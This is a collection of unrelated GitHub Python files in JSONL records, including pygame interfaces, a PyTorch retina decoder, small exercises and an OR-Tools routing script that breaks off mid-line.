+{"seq_id":"26704729315","text":"import pygame\nimport os\nimport random as rd\nfrom game import main_game_loop\nfrom pygame.locals import (\n K_ESCAPE\n)\n\npygame.init()\n\nres = (1920, 1080)\nscreen = pygame.display.set_mode(res)\nbackground = pygame.image.load('images/homescreen_bg.jpg').convert_alpha()\nbackground_rescaled = pygame.transform.scale(background, res)\n\nwidth = screen.get_width()\nheight = screen.get_height()\n\nbutton_font = pygame.font.SysFont('Showcard Gothic', 50)\ncoup_font = pygame.font.SysFont('Showcard Gothic', 100)\ncoup_text = coup_font.render(\"Welcome to COUP\", True, (255, 255, 255))\n\n\nclass Button:\n def __init__(self):\n self.width = 600\n self.height = 100\n self.x = width / 2 - 320\n self.y = height / 2\n self.color_grey = (100, 100, 100)\n self.color_red = (0, 0, 100)\n self.button_text = button_font\n\n def render_button(self):\n return pygame.draw.rect(screen, self.color_grey, [self.x, self.y, self.width, self.height], border_radius=10)\n\n def render_button_text(self):\n button_text = self.button_text.render(\"PLAY\", True, (255, 255, 255))\n return screen.blit(button_text, (self.x + 225, self.y + 30))\n\n def hover_button_box(self):\n x, y = pygame.mouse.get_pos()\n if self.x <= x <= self.x + 600 and self.y <= y <= self.y + 100:\n return pygame.draw.rect(screen, self.color_red, [self.x, self.y, self.width, self.height], border_radius=10)\n\n def hover_click(self):\n x, y = pygame.mouse.get_pos()\n if self.x <= x <= self.x + 600 and self.y <= y <= self.y + 100:\n return True\n\n def click_button(self):\n return\n\n\nbutton = Button()\n\nrunning = True\nwhile running:\n pressed_key = pygame.key.get_pressed()\n mouse_state = pygame.mouse.get_pressed()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if pressed_key[K_ESCAPE]:\n running = False\n if event.type == pygame.MOUSEBUTTONDOWN and button.hover_click():\n main_game_loop()\n running = False\n\n screen.blit(background_rescaled, (0, 0))\n\n button.render_button()\n button.hover_button_box()\n button.render_button_text()\n\n screen.blit(coup_text, (500, 300))\n\n pygame.display.flip()\n pygame.display.update()\n","repo_name":"DanTheManWithAPIan/Coup---Card-Game","sub_path":"home_screen.py","file_name":"home_screen.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"36314130236","text":"import random\nvec=[]\nfor i in range (30):\n vec.append(round(random.randint(5,28)))\nprint(vec)\nm1=vec[:15]\ns=0\nfor i in m1:\n s+=i\nprint('Promedio primera quincena=',s/len(m1))\nm2=vec[15:-1]\nt1=vec[:11]\nprint(m1)\nprint(m2)\nprint(t1)","repo_name":"padillasam/python2560664B","sub_path":"listas/rebanadas1.py","file_name":"rebanadas1.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"21554086872","text":"# encoding=utf-8\nfrom until.ObjectMap import *\nfrom until.ParseConfigurationFile import ParseCofigFile\n\n\nclass HomePage(object):\n\n def __init__(self, driver):\n self.driver = driver\n self.parseCF = ParseCofigFile()\n\n def addressLink(self):\n try:\n # 从定位表达式配置文件读取定位通讯录按钮的定位方式和表达式\n locateType, locatorExpression = self.parseCF.getOptionValue(\"126mail_homePage\",\n \"homePage.addressbook\").split(\">\")\n # 获取登录页面的输入登录方式按钮页面对象,并返回给调用者\n elementObj = getElement(self.driver, locateType, locatorExpression)\n return elementObj\n except Exception as e:\n raise e\n\n\n","repo_name":"lxc1997YE/DataDrivenFrameWork","sub_path":"pageObjects/HomePage.py","file_name":"HomePage.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"23512979841","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nimport os\n\nimport recurrent_convolution as crnns\nfrom temporal_convolution import TemporalConv3dStack, CausalTranspose3d\nfrom util_modules import Permuter, make_pool3d_layer\nfrom sim_util import StackPlotter\nfrom create_movies import ProgressBar\n\nimport torch\nfrom torch import nn\n# import torch.nn.functional as F\nfrom torch import optim\n\nfrom custom_loss import DecoderLoss\nfrom retina_dataset_h5 import RetinaVideos\nfrom torch.utils.data import DataLoader\n\n# import time as timer\n\n\"\"\"\nThoughts:\n- scale the calculated loss up by a function of how much alpha has\n decreased, since decaying alpha will decrease loss on it's own?\n out = mean(loss) * start_alpha/current_alpha\n There is probably a better equation, but this gets at the idea...\n- Tried 5x5x5 transpose (no post-conv) and found the resulting decodings\n were diffuse, may be that the 5x5 spatial part of the kernel was too\n expansive especially at the first spatial upsampling stage.\n- try RMSProp with momentum soon, see whether more stable than ADAM\n- batch_sz=8 makes gradient much more stable. Even with lr=1e-1.\n\"\"\"\n\n\nclass RetinaDecoder(nn.Module):\n\n def __init__(self, pre_pool, grp_tempo_params, conv_params,\n crnn_cell_params, temp3d_stack_params, trans_params,\n post_conv_params):\n super(RetinaDecoder, self).__init__()\n # layer parameters\n self.pre_pool = pre_pool\n self.grp_tempo_params = grp_tempo_params\n self.conv_params = conv_params\n self.crnn_cell_params = crnn_cell_params\n self.temp3d_stack_params = temp3d_stack_params\n self.trans_params = trans_params\n self.post_conv_params = post_conv_params\n # create model and send to correct device (GPU if available)\n self.build()\n self.dv = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n self.to(self.dv)\n\n def build(self):\n # # # # # # # # # # ENCODER NETWORK # # # # # # # # # #\n encoder_mods = []\n\n # pooling operation before any processing\n if 'op' in self.pre_pool: # skip by leaving param dict empty\n encoder_mods.append(make_pool3d_layer(self.pre_pool))\n\n # Grouped Temporal CNN, operating on each cluster channel separately\n for p in self.grp_tempo_params:\n encoder_mods.append(\n TemporalConv3dStack(\n p['in'], p['out'], p.get('kernel', (2, 1, 1)),\n p.get('space_dilation', 1), p.get('groups', 1),\n p.get('dropout', 0), p.get('activation', nn.ReLU)\n )\n )\n if 'pool' in p:\n encoder_mods.append(make_pool3d_layer(p['pool']))\n\n # Spatial Only (non-causal) convolutional layers\n for p in self.conv_params:\n d, h, w = p.get('kernel', (1, 3, 3))\n pad = (d//2, h//2, w//2)\n encoder_mods.append(\n nn.Conv3d(\n p['in'], p['out'], (d, h, w), p.get('stride', 1), pad,\n p.get('dilation', 1), p.get('groups', 1),\n p.get('bias', True)\n )\n )\n encoder_mods.append(nn.BatchNorm3d(p['out']))\n encoder_mods.append(p.get('activation', nn.ReLU)())\n if 'pool' in p:\n encoder_mods.append(make_pool3d_layer(p['pool']))\n\n # Stack of Convolutional Recurrent Network(s)\n if len(self.crnn_cell_params) > 0:\n # swap time from depth dimension to first dimension for CRNN(s)\n # (N, C, T, H, W) -> (T, N, C, H, W)\n encoder_mods.append(Permuter((2, 0, 1, 3, 4)))\n for p in self.crnn_cell_params:\n # recurrenct convolutional cells (GRU or LSTM)\n encoder_mods.append(\n p.get('crnn_cell', crnns.ConvGRUCell_wnorm)(\n p['dims'], p['in_kernel'], p['out_kernel'], p['in'],\n p['out'], p.get('learn_initial', False),\n p.get('return_hidden', False)\n )\n )\n if 'post_activation' in p:\n encoder_mods.append(p['post_activation']())\n if len(self.crnn_cell_params) > 0:\n # swap time back to depth dimension following CRNN(s)\n # (T, N, C, H, W) -> (N, C, T, H, W)\n encoder_mods.append(Permuter((1, 2, 0, 3, 4)))\n\n # Temporal CNN\n for p in self.temp3d_stack_params:\n encoder_mods.append(\n TemporalConv3dStack(\n p['in'], p['out'], p.get('kernel', (2, 3, 3)),\n p.get('space_dilation', 1), p.get('groups', 1),\n p.get('dropout', 0), p.get('activation', nn.ReLU)\n )\n )\n\n # package encoding layers as a Sequential network\n self.encoder_net = nn.Sequential(*encoder_mods)\n\n # # # # # # # # # # DECODER NETWORK # # # # # # # # # #\n decoder_mods = []\n\n # Causal Transpose Convolutional layers (upsampling)\n for p in self.trans_params:\n decoder_mods.append(\n CausalTranspose3d(\n p['in'], p['out'], p['kernel'], p['stride'],\n p.get('groups', 1), p.get('bias', True),\n p.get('dilations', (1, 1, 1))\n )\n )\n decoder_mods.append(nn.BatchNorm3d(p['out']))\n decoder_mods.append(p.get('activation', nn.Tanh)())\n\n # Spatial Only (non-causal) convolutional layers\n for p in self.post_conv_params:\n d, h, w = p.get('kernel', (1, 3, 3))\n pad = (d//2, h//2, w//2)\n decoder_mods.append(\n nn.Conv3d(\n p['in'], p['out'], (d, h, w), p.get('stride', 1), pad,\n p.get('dilation', 1), p.get('groups', 1),\n p.get('bias', True)\n )\n )\n decoder_mods.append(nn.BatchNorm3d(p['out']))\n decoder_mods.append(p.get('activation', nn.Tanh)())\n\n # package decoding layers as a Sequential network\n self.decoder_net = nn.Sequential(*decoder_mods)\n\n def forward(self, X):\n X = self.encoder_net(X)\n X = self.decoder_net(X)\n return X\n\n def fit(self, train_set, test_set, lr=1e-4, epochs=10, batch_sz=1,\n loss_alpha=10, loss_decay=1, print_every=0, peons=2):\n\n train_loader = DataLoader(\n train_set, batch_size=batch_sz, shuffle=True, num_workers=peons\n )\n test_loader = DataLoader(\n test_set, batch_size=batch_sz, num_workers=peons\n )\n N = train_set.__len__() # number of samples\n\n # DecoderLoss equivalent to MSE when alpha=0 (original default: 10)\n self.loss = DecoderLoss(alpha=loss_alpha, decay=loss_decay).to(self.dv)\n self.optimizer = optim.Adam(self.parameters(), lr=lr, eps=1e-8)\n\n n_batches = N // batch_sz\n print_every = n_batches if print_every < 1 else print_every\n train_prog = None\n train_costs, test_costs = [], []\n for i in range(epochs):\n cost = 0\n print(\"epoch:\", i, \"n_batches:\", n_batches)\n # start = 0\n for j, batch in enumerate(train_loader):\n # print('time to load batch', timer.time()-start)\n # start = timer.time()\n net, stim = batch['net'].to(self.dv), batch['stim'].to(self.dv)\n cost += self.train_step(net, stim)\n del net, stim, batch\n # print('time to train', timer.time()-start)\n train_prog.step() if train_prog is not None else 0\n if j % print_every == 0:\n test_prog = ProgressBar(\n test_set.__len__() // batch_sz,\n size=test_set.__len__() // batch_sz,\n label='validating: '\n )\n # costs and accuracies for test set\n test_cost = 0\n for t, testB in enumerate(test_loader, 1):\n net = testB['net'].to(self.dv)\n stim = testB['stim'].to(self.dv)\n testB_cost = self.get_cost(net, stim)\n del net, stim, testB\n test_cost += testB_cost\n test_prog.step()\n test_cost /= t+1\n print(\"validation cost: %f\" % (test_cost))\n\n train_prog = ProgressBar(\n print_every, size=test_set.__len__()*2 // batch_sz,\n label='training: '\n )\n train_prog.step() if j == 0 else 0 # hack, skipped batch\n # start = timer.time()\n\n # Decay DecoderLoss sparsity penalty\n self.loss.decay()\n\n # for plotting\n train_costs.append(cost / n_batches)\n test_costs.append(test_cost)\n\n # plot cost and accuracy progression\n fig, axes = plt.subplots(1)\n axes.plot(train_costs, label='training')\n axes.plot(test_costs, label='validation')\n axes.set_xlabel('Epoch')\n axes.set_ylabel('Cost')\n plt.legend()\n plt.show()\n\n def train_step(self, inputs, targets):\n self.train() # set the model to training mode\n self.optimizer.zero_grad() # Reset gradient\n\n # Forward\n decoded = self.forward(inputs) # (N, C, T, H, W)\n output = self.loss.forward(\n # swap time to second dimension -> (N, T, C, H, W)\n decoded.transpose(1, 2), targets\n )\n\n # Backward\n output.backward() # compute gradients\n self.optimizer.step() # Update parameters\n\n return output.item() # cost\n\n def get_cost(self, inputs, targets):\n self.eval() # set the model to testing mode\n self.optimizer.zero_grad() # Reset gradient\n with torch.no_grad():\n # Forward\n decoded = self.forward(inputs) # (N, C, T, H, W)\n output = self.loss.forward(\n # swap time to second dimension -> (N, T, C, H, W)\n decoded.transpose(1, 2), targets\n )\n return output.item()\n\n def decode(self, sample_set):\n self.eval() # set the model to testing mode\n sample_loader = DataLoader(\n sample_set, batch_size=1, shuffle=True, num_workers=2\n )\n for i, sample in enumerate(sample_loader):\n with torch.no_grad():\n # get stimulus prediction from network activity\n net = sample['net'].to(self.dv)\n decoded = self.forward(net)\n del net\n\n # Reduce out batch and channel dims, then put time last\n # (N, C, T, H, W) -> (H, W, T)\n decoded = decoded.squeeze().cpu().numpy().transpose(1, 2, 0)\n net = sample['net'].squeeze().numpy().sum(axis=0)\n net = net.transpose(1, 2, 0)\n stim = sample['stim'].squeeze().numpy().transpose(1, 2, 0)\n\n # synced scrollable videos of cell actity, decoding, and stimulus\n fig, ax = plt.subplots(1, 3, figsize=(17, 6))\n net_stack = StackPlotter(ax[0], net, delta=1, vmin=0)\n deco_stack = StackPlotter(ax[1], decoded, delta=1, vmin=-1, vmax=1)\n stim_stack = StackPlotter(ax[2], stim, delta=1, vmin=-1, vmax=1)\n fig.canvas.mpl_connect('scroll_event', net_stack.onscroll)\n fig.canvas.mpl_connect('scroll_event', deco_stack.onscroll)\n fig.canvas.mpl_connect('scroll_event', stim_stack.onscroll)\n ax[0].set_title('Network Recording')\n ax[1].set_title('Decoding')\n ax[2].set_title('Stimulus')\n fig.tight_layout()\n plt.show()\n\n again = input(\n \"Show another reconstruction? Enter 'n' to quit\\n\")\n if again == 'n':\n break\n\n def save_decodings(self, sample_set):\n self.eval() # set the model to testing mode\n sample_loader = DataLoader(sample_set, batch_size=1, num_workers=2)\n\n # make a parent output folder for this dataset if it doesn't exist\n outfold = os.path.join(sample_set.root_dir, 'outputs')\n if not os.path.isdir(outfold):\n os.mkdir(outfold)\n # prompt for name of and create this particular runs output folder\n while True:\n nametag = input(\"Decoding set name: \")\n basefold = os.path.join(outfold, nametag)\n if not os.path.isdir(basefold):\n os.mkdir(basefold)\n break\n else:\n print('Folder exists, provide another name...')\n\n # generate decoding of every sample in given dataset\n for i, sample in enumerate(sample_loader):\n with torch.no_grad():\n # get stimulus prediction from network activity\n net = sample['net'].to(self.dv)\n decoded = self.forward(net)\n del sample, net\n\n # Reduce out batch and channel dims\n # (T, N, C, H, W) -> (T, H, W)\n decoded = decoded.squeeze().cpu().numpy()\n\n # save into subfolder corresponding to originating network\n decofold = os.path.join(\n basefold, sample_set.rec_frame.iloc[i, 0], # net folder name\n )\n if not os.path.isdir(decofold):\n os.mkdir(decofold)\n # .npy format\n np.save(\n # file name corresponding to stimulus\n os.path.join(decofold, sample_set.rec_frame.iloc[i, 1]),\n decoded\n )\n\n\ndef decoder_setup_1():\n \"\"\"\n Playing with spatial convs after transpose convolutions. Recent testing\n suggests this is the best setup so far. Revisit idea of interleaving\n spatial convolutions between transpose layers to achieve more cleanly\n defined shapes.\n \"\"\"\n decoder = RetinaDecoder(\n # pre-pooling\n {'op': 'avg', 'kernel': (1, 2, 2), 'causal': True},\n # grouped temporal conv stacks:\n [\n {\n 'in': 15, 'out': [45, 45, 15], 'kernel': (2, 1, 1),\n 'stride': 1, 'groups': 15, 'acivation': nn.ReLU,\n 'pool': {'op': 'avg', 'kernel': (2, 2, 2), 'causal': True}\n }\n ],\n # spatial conv layers: {in, out, kernel, stride}\n [\n # {'in': 15, 'out': 64, 'kernel': (1, 3, 3), 'stride': 1}\n ],\n # for each ConvRNN cell:\n [\n\n ],\n # temporal convolution stack(s)\n [\n {\n 'in': 15, 'out': [128, 256, 128], 'kernel': (2, 3, 3),\n 'stride': 1, 'groups': 1, 'acivation': nn.ReLU\n }\n ],\n # ConvTranspose layers: {in, out, kernel, stride}\n [\n {'in': 128, 'out': 64, 'kernel': (3, 3, 3), 'stride': (2, 2, 2)},\n {'in': 64, 'out': 16, 'kernel': (3, 3, 3), 'stride': (1, 2, 2)},\n ],\n # post conv layers\n [\n {'in': 16, 'out': 8, 'kernel': (1, 3, 3), 'stride': 1},\n {'in': 8, 'out': 1, 'kernel': (1, 1, 1), 'stride': 1}\n ],\n )\n return decoder\n\n\ndef decoder_setup_2():\n \"\"\"\n This setup was the first big success, solid base config to work from.\n Note the lack of causal pooling, I hadn't built that module yet.\n \"\"\"\n decoder = RetinaDecoder(\n # pre-pooling\n {'op': 'avg', 'kernel': (1, 2, 2), 'causal': False},\n # grouped temporal conv stacks:\n [\n {\n 'in': 15, 'out': [45, 45, 15], 'kernel': (2, 1, 1),\n 'stride': 1, 'groups': 15, 'acivation': nn.ReLU,\n 'pool': {'op': 'avg', 'kernel': (2, 2, 2), 'causal': False}\n }\n ],\n # spatial conv layers: {in, out, kernel, stride}\n [\n\n ],\n # for each ConvRNN cell:\n [\n\n ],\n # temporal convolution stack(s)\n [\n {\n 'in': 15, 'out': [128, 256, 128], 'kernel': (2, 3, 3),\n 'stride': 1, 'groups': 1, 'acivation': nn.ReLU\n }\n ],\n # ConvTranspose layers: {in, out, kernel, stride}\n [\n {'in': 128, 'out': 64, 'kernel': (3, 3, 3), 'stride': (2, 2, 2)},\n {'in': 64, 'out': 1, 'kernel': (3, 3, 3), 'stride': (1, 2, 2)},\n ],\n # post conv layers\n [\n\n ],\n )\n return decoder\n\n\ndef decoder_setup_3():\n \"Test lack of temporal downsampling.\"\n decoder = RetinaDecoder(\n # pre-pooling\n {'op': 'avg', 'kernel': (1, 2, 2)},\n # grouped temporal conv stacks:\n [\n {\n 'in': 15, 'out': [45, 45, 15], 'kernel': (2, 1, 1),\n 'stride': 1, 'groups': 15, 'acivation': nn.ReLU,\n 'pool': {'op': 'avg', 'kernel': (1, 2, 2)}\n }\n ],\n # spatial conv layers: {in, out, kernel, stride}\n [\n\n ],\n # for each ConvRNN cell:\n [\n\n ],\n # temporal convolution stack(s)\n [\n {\n 'in': 15, 'out': [128, 256, 128], 'kernel': (2, 3, 3),\n 'stride': 1, 'groups': 1, 'acivation': nn.ReLU\n }\n ],\n # ConvTranspose layers: {in, out, kernel, stride}\n [\n {'in': 128, 'out': 64, 'kernel': (3, 3, 3), 'stride': (1, 2, 2)},\n {'in': 64, 'out': 1, 'kernel': (3, 3, 3), 'stride': (1, 2, 2)},\n ],\n # post conv layers\n [\n\n ],\n )\n return decoder\n\n\ndef decoder_setup_4():\n \"Token Conv RNN build.\"\n decoder = RetinaDecoder(\n # pre-pooling\n {'op': 'avg', 'kernel': (1, 2, 2)},\n # grouped temporal conv stacks:\n [\n {\n 'in': 15, 'out': [45, 45, 15], 'kernel': (2, 1, 1),\n 'stride': 1, 'groups': 15, 'acivation': nn.ReLU,\n 'pool': {'op': 'avg', 'kernel': (2, 2, 2)}\n }\n ],\n # spatial conv layers: {in, out, kernel, stride}\n [\n # {'in': 15, 'out': 64, 'kernel': (2, 1, 1), 'stride': 1}\n ],\n # for each ConvRNN cell:\n [\n {\n 'cell': crnns.ConvGRUCell_wnorm, 'dims': (25, 25),\n 'in_kernel': (3, 3), 'out_kernel': (3, 3), 'in': 15, 'out': 64,\n 'learn_initial': False, 'post_activation': nn.ReLU\n }\n ],\n # temporal convolution stack(s)\n [\n\n ],\n # ConvTranspose layers: {in, out, kernel, stride}\n [\n {'in': 64, 'out': 64, 'kernel': (3, 3, 3), 'stride': (2, 2, 2)},\n {'in': 64, 'out': 1, 'kernel': (3, 3, 3), 'stride': (1, 2, 2)},\n ],\n # post conv layers\n [\n\n ],\n )\n return decoder\n\n\ndef decoder_setup_5():\n \"\"\"\n This is the same as setup_2, which was the first breakthrough network,\n except here the pooling operations have been set to causal mode.\n On colab, 2x 20 epochs with lr=1e-1 and batch_sz=8 has produced strong\n strong decoding results.\n \"\"\"\n decoder = RetinaDecoder(\n # pre-pooling\n {'op': 'avg', 'kernel': (1, 2, 2), 'causal': True},\n # grouped temporal conv stacks:\n [\n {\n 'in': 15, 'out': [45, 45, 15], 'kernel': (2, 1, 1),\n 'stride': 1, 'groups': 15, 'acivation': nn.ReLU,\n 'pool': {'op': 'avg', 'kernel': (2, 2, 2), 'causal': True}\n }\n ],\n # spatial conv layers: {in, out, kernel, stride}\n [\n # {'in': 15, 'out': 64, 'kernel': (1, 3, 3), 'stride': 1}\n ],\n # for each ConvRNN cell:\n [\n\n ],\n # temporal convolution stack(s)\n [\n {\n 'in': 15, 'out': [128, 256, 128], 'kernel': (2, 3, 3),\n 'stride': 1, 'groups': 1, 'acivation': nn.ReLU\n }\n ],\n # ConvTranspose layers: {in, out, kernel, stride}\n [\n {'in': 128, 'out': 64, 'kernel': (3, 3, 3), 'stride': (2, 2, 2)},\n {'in': 64, 'out': 1, 'kernel': (3, 3, 3), 'stride': (1, 2, 2)},\n ],\n # post conv layers\n [\n\n ],\n )\n return decoder\n\n\ndef main():\n # train_path = 'D:/retina-sim-data/third/train_video_dataset/'\n # test_path = 'D:/retina-sim-data/third/test_video_dataset/'\n basepath = '/media/geoff/Data/retina-sim-data/third/'\n train_path = basepath + 'train_video_dataset/'\n test_path = basepath + 'test_video_dataset/'\n\n print('Building datasets...')\n # train_set = RetinaVideos(\n # train_path, preload=False, crop_centre=[100, 100], time_first=False,\n # frame_lag=0\n # )\n # test_set = RetinaVideos(\n # test_path, preload=False, crop_centre=[100, 100], time_first=False,\n # frame_lag=0\n # )\n train_set = RetinaVideos(\n basepath, 'train_video_dataset.h5', preload=False,\n crop_centre=[100, 100], time_first=False, frame_lag=0\n )\n test_set = RetinaVideos(\n basepath, 'test_video_dataset.h5', preload=False,\n crop_centre=[100, 100], time_first=False, frame_lag=0\n )\n\n print('Building model...')\n decoder = decoder_setup_5()\n\n if 'n' not in input(\"Load pre-trained state dict? (y/n):\"):\n while True:\n dict_path = input(\"Path to pickled RetinaDecoder state_dict:\")\n if not os.path.isfile(dict_path):\n print('Not a file, typo? Try again...')\n else:\n break\n decoder.load_state_dict(torch.load(dict_path))\n\n print('Fitting model...')\n decoder.fit(\n train_set, test_set, lr=1e-2, epochs=1, batch_sz=4, print_every=0,\n loss_alpha=10, loss_decay=.9, peons=2\n )\n\n print('Training set examples...')\n decoder.decode(train_set)\n print('Validation set examples...')\n decoder.decode(test_set)\n\n if 'n' not in input(\"Save trained decoder's state dict? (y/n):\"):\n path = input('Name for pickled model state:')\n torch.save(decoder.state_dict(), path)\n\n if 'n' not in input(\"Save training set decodings? (y/n):\"):\n decoder.save_decodings(train_set)\n if 'n' not in input(\"Save validation set decodings? (y/n):\"):\n decoder.save_decodings(test_set)\n\n\nif __name__ == '__main__':\n torch.backends.cudnn.benchmark = True\n\n main()\n","repo_name":"geoffder/retina-decoder","sub_path":"decoder_v4.py","file_name":"decoder_v4.py","file_ext":"py","file_size_in_byte":22521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"71401153826","text":"from datetime import datetime\nfrom hub.client.utils import get_user_name\nfrom typing import List, Optional\n\n\nclass CommitNode:\n \"\"\"Contains all the Version Control information about a particular commit.\"\"\"\n\n def __init__(self, branch: str, commit_id: Optional[str] = None):\n self.commit_id = commit_id\n self.branch = branch\n self.children: List[\"CommitNode\"] = []\n self.parent: Optional[\"CommitNode\"] = None\n self.commit_message: Optional[str] = None\n self.commit_time: Optional[datetime] = None\n self.commit_user_name: Optional[str] = None\n\n def add_child(self, node: \"CommitNode\"):\n \"\"\"Adds a child to the node, used for branching.\"\"\"\n node.parent = self\n self.children.append(node)\n\n def add_successor(self, node: \"CommitNode\", message: Optional[str] = None):\n \"\"\"Adds a successor (a type of child) to the node, used for commits.\"\"\"\n node.parent = self\n self.children.append(node)\n self.commit_message = message\n self.commit_user_name = get_user_name()\n self.commit_time = datetime.now()\n\n def __repr__(self) -> str:\n return f\"Commit : {self.commit_id} ({self.branch}) \\nAuthor : {self.commit_user_name}\\nTime : {str(self.commit_time)[:-7]}\\nMessage: {self.commit_message}\"\n\n __str__ = __repr__\n","repo_name":"gkr-bot/ci-cd-demo-repo","sub_path":"hub/core/version_control/commit_node.py","file_name":"commit_node.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72636891428","text":"import sys\nfrom collections import deque\ninput = sys.stdin.readline\n\nn, k = map(int, input().split())\ndistance = [0]*100001\n\n\ndef bfs():\n q = deque()\n q.append(n)\n while q:\n a = q.popleft()\n if a == k:\n print(distance[a])\n break\n for case in (a-1, a+1, a*2):\n if 0 <= case <= 100000 and not distance[case]:\n distance[case] = distance[a]+1\n q.append(case)\n\n\nbfs()\n","repo_name":"jeonhl7579/jeonhl7579","sub_path":"bfs/BOJ1697.py","file_name":"BOJ1697.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"29908010989","text":"import time\nx = int(input(\"Hvilket tall skal sjekkes?: \"))\nstart = time.time()\n\nA = [1,2,3,4,5,9,11,15,18,20,25,28,30,34,37,39,41,46,47,49,52,56,59,70]\ndef check(A, x):\n for i in A:\n if i==x:\n return True\n return False\n\nprint(A)\nres = check(A, x)\nprint(res)\nend = time.time()\nelapsed = end - start\nprint(\"\\nThe search took: \", elapsed)\nwhile res == False:\n x = int(input(\"Hvilket tall skal sjekkes?: \"))\n res = check(A, x)\n print(res)","repo_name":"jrundht/IN2010","sub_path":"Algorithms and datastructures/sok.py","file_name":"sok.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9674204821","text":"#!/usr/bin/env python\n# Robot Stop Button code: This contains code for the \"STOP\" button in the radar display\n#\n# Created By: Jeovanny Reyes\n# Created On: March 3, 2018\n#\n#\n# Raytheon Radar Guided Rescue robot\n# Cal State LA\n\nimport math\nimport time\nimport pygame\n\nfrom text_object_black import text_object_black\n\nSTOP_BUTTON_X_SCALE = 0.030\nis_mouse_over_button_bool = False\n\ndef stop_button(xpos,ypos,stop_val,brightred,red):\n mouse = pygame.mouse.get_pos() # Obtains position of mouse\n click = pygame.mouse.get_pressed()[0] # Obtains information when mouse gets clicked\n fontsize = int(xpos * STOP_BUTTON_X_SCALE)\n smalltext = pygame.font.Font(\"freesansbold.ttf\",30)\n x_pos = xpos * 0.050 # X Coordinate for button position\n y_pos = ypos * 0.035 # Y Coordinate for button position\n x_length = xpos * 0.150 # Length of \"STOP\" button\n y_width = ypos * 0.050 # Width of \"STOP\" button\n\n stop = stop_val # Initialy contains \"False\" boolean\n\n xposlength = x_pos + x_length\n yposwidth = y_pos + y_width\n\n # return xposlength, yposwidth, mouse, x_pos, y_pos, x_length, y_width\n is_mouse_over_button_bool = is_mouse_over_button(xposlength, x_pos, yposwidth, y_width)\n if is_mouse_over_button_bool: # Hovering over box\n pygame.draw.rect(pygame.display.get_surface(),brightred,(x_pos,y_pos,x_length,y_width))\n if click: # When we left click on the \"STOP\" button\n print('Robot has stopped moving!')\n stop = True # Value is then set to Stop\n\n else:\n pygame.draw.rect(pygame.display.get_surface(),red,(x_pos,y_pos,x_length,y_width))\n\n textSurf,textRect = text_object_black(\"STOP\",smalltext)\n textRect.center = ((x_pos +(x_length/2)), y_pos+(y_width/2))\n pygame.display.get_surface().blit(textSurf, textRect)\n return stop\n\ndef is_mouse_over_button(xposlength, x_pos, yposwidth, y_width):\n \"\"\"Detects if mouse is hovering over a button\"\"\"\n mouse = pygame.mouse.get_pos()\n return ((xposlength > mouse[0] > x_pos) and (yposwidth > mouse[1] > y_width))\n","repo_name":"jreyes81/rescuerobot","sub_path":"src/robot_stop.py","file_name":"robot_stop.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"14095209216","text":"\"\"\"Simple Vehicles Routing Problem (VRP).\n\n This is a sample using the routing library python wrapper to solve a VRP\n problem.\n A description of the problem can be found here:\n http://en.wikipedia.org/wiki/Vehicle_routing_problem.\n\n Distances are in meters.\n\"\"\"\n\nTOTAL_VEHICLES = 1\nMAX_DISTANCE = 30000\nMULTIPLIER = 10\n\nfrom ortools.constraint_solver import routing_enums_pb2\nfrom ortools.constraint_solver import pywrapcp\nimport pickle\nimport sys\nimport datetime\nimport numpy as np\n\ndef create_data_model(matrix_file):\n \"\"\"Stores the data for the problem.\"\"\"\n\n data = {}\n # The matrix is divided by 10 for ease of calculation.\n # Multiplier is set to 10\n data['distance_matrix'] = (np.load(matrix_file)/MULTIPLIER).astype(int)\n data['num_vehicles'] = int(TOTAL_VEHICLES)\n data['depot'] = 0\n return data\n\n# Function added to save the routes as a list\ndef save_to_table(manager, routing, solution):\n \"\"\"Saves as a list.\"\"\"\n routes = []\n distances = []\n for vehicle_id in range(routing.vehicles()):\n route_distance = 0\n index = routing.Start(vehicle_id)\n route = [manager.IndexToNode(index)]\n while not routing.IsEnd(index):\n previous_index = index\n index = solution.Value(routing.NextVar(index))\n route_distance += routing.GetArcCostForVehicle(\n previous_index, index, vehicle_id)\n route.append(manager.IndexToNode(index))\n routes.append(route)\n distances.append(route_distance)\n\n # Multiply the distances by 10 to get the actual distance\n distances = distances * MULTIPLIER\n return routes, distances\n\n\n# Function below is from Google OR-Tools VRP example\n\ndef print_solution(data, manager, routing, solution):\n \"\"\"Prints solution on console.\"\"\"\n print(f'Objective: {solution.ObjectiveValue()}')\n max_route_distance = 0\n for vehicle_id in range(data['num_vehicles']):\n index = routing.Start(vehicle_id)\n plan_output = 'Route for vehicle {}:\\n'.format(vehicle_id)\n route_distance = 0\n while not routing.IsEnd(index):\n plan_output += ' {} -> '.format(manager.IndexToNode(index))\n previous_index = index\n index = solution.Value(routing.NextVar(index))\n route_distance += routing.GetArcCostForVehicle(\n previous_index, index, vehicle_id)\n plan_output += '{}\\n'.format(manager.IndexToNode(index))\n plan_output += 'Distance of the route: {}m\\n'.format(route_distance)\n print(plan_output)\n max_route_distance = max(route_distance, max_route_distance)\n print('Maximum of the route distances: {}m'.format(max_route_distance))\n\n\ndef main():\n \"\"\"Entry point of the program.\"\"\"\n\n filename = sys.argv[1]\n\n # Instantiate the data problem.\n data = create_data_model(filename)\n data['distance_matrix'] = data['distance_matrix'].tolist()\n\n # Create the routing index manager.\n manager = 